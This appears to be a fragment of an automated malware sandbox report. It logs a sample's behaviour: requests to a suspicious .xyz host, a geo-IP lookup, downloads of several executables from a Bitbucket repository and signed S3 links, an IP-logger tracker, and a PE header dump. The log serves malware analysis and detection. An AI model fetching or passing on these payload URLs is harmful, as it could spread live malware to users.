buffer:'"C:\Windows \System32\PasswordOnWakeSettingFlyout.exe"' is not recognized as an internal or external command,
operable program or batch file.
console_handle:0x000000000000000b
POST method with no referer header, POST method with no useragent header
suspicious_request
POST http://pokacienon.xyz/
suspicious_features
GET method with no useragent header
suspicious_request
GET https://api.ip.sb/geoip
suspicious_features
GET method with no useragent header
suspicious_request
GET https://bitbucket.org/mminminminmin05/testtest/downloads/serv.exe
suspicious_features
GET method with no useragent header
suspicious_request
GET https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/9580842f-6891-49c8-802a-149bf1d42264/serv.exe?Signature=pn6i4toRFefu0thF36SY2ehfP5o%3D&Expires=1617875783&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=Iu1.paGkjklgsxTllu12XmiT7Jmt91vp&response-content-disposition=attachment%3B%20filename%3D%22serv.exe%22
suspicious_features
GET method with no useragent header
suspicious_request
GET https://bitbucket.org/mminminminmin05/testtest/downloads/test.exe
suspicious_features
GET method with no useragent header
suspicious_request
GET https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/62ab596d-a885-41d2-8876-b14668b5131e/test.exe?Signature=QTjNeEZOEfvGMKnBzCyT7mG4nIg%3D&Expires=1617876243&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=4_MBFBXZdU5kGeZTREx1qRsbERpZ4M_z&response-content-disposition=attachment%3B%20filename%3D%22test.exe%22
suspicious_features
GET method with no useragent header
suspicious_request
GET https://bitbucket.org/mminminminmin05/testtest/downloads/newred.exe
suspicious_features
GET method with no useragent header
suspicious_request
GET https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/a1867a39-2dbe-42c2-b513-5f9bd398e056/newred.exe?Signature=%2Bly8TEK7wfszfC4CJMdwVZNxl90%3D&Expires=1617876376&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=XZ1Wq9dWgSEXAF.IA6b.w7ImqXWWjs9E&response-content-disposition=attachment%3B%20filename%3D%22newred.exe%22
request
GET https://iplogger.org/1tsTg7
request
GET https://iplogger.org/favicon.ico
buffer:MZ ÿÿ ¸ @ º ´ Í!¸LÍ!This program cannot be run in DOS mode.
$ PE L àIH à 0 P Re @ À @ e O ä äd H .text O P `.rsrc ä T @ @.reloc \ @ B base_address:0x00400000 process_identifier:2848 process_handle:0x00000290